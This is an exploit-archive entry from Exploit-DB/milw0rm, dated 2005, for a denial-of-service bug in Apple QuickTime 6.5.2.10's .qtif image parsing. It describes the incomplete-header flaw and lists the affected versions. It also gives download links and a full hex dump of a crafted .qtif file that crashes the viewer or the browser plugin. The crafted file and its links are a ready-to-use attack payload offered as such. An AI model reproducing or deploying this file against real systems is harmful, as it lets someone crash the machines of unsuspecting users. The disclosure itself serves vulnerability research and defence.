Apple QuickTime 6.5.2.10 - '.qtif' Image Parsing

EDB-ID:

770

CVE:


Author:

ATmaCA

Type:

dos

Platform:

Windows

Published:

2005-01-24

# Added qtif on milw0rm's sploits archive/ /str0ke #

Application: QuickTime
            http://www.apple.com/quicktime/

AFFECTED VERSION:
Versions verified to be vulnerable:
QuickTime.qts (6.5.2.10) and prior versions are affected.

The bug:
The problem specifically exists when QuickTime.qts component parsing
(.qtif) image files that contain uncompleted header.
A remote user can create a file that when processed by QuickTime PictureViewer or via browser,
will can cause the remote system to crash.

--Uncompleted qtif image file header
http://www.atmacasoft.com/exp/vuln.qtif.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/770.qtif (vuln.qtif)

00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............
0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM
00000038 0001 0C50 686F 746F 202D 204A 5045 4700 0000 0000 0000 0000 0000 0000 ...Photo - JPEG.............
00000054 0000 0000 0000 0018 FFFF 0000 7255 6964 6174 FFD8 FFE0 0010           ............rUidat......

VENDOR RESPONSE:
No vendor response.

Discoveried By ATmaCA
AtmacaSoft Inc.
http://www.atmacasoft.com

# milw0rm.com [2005-01-24]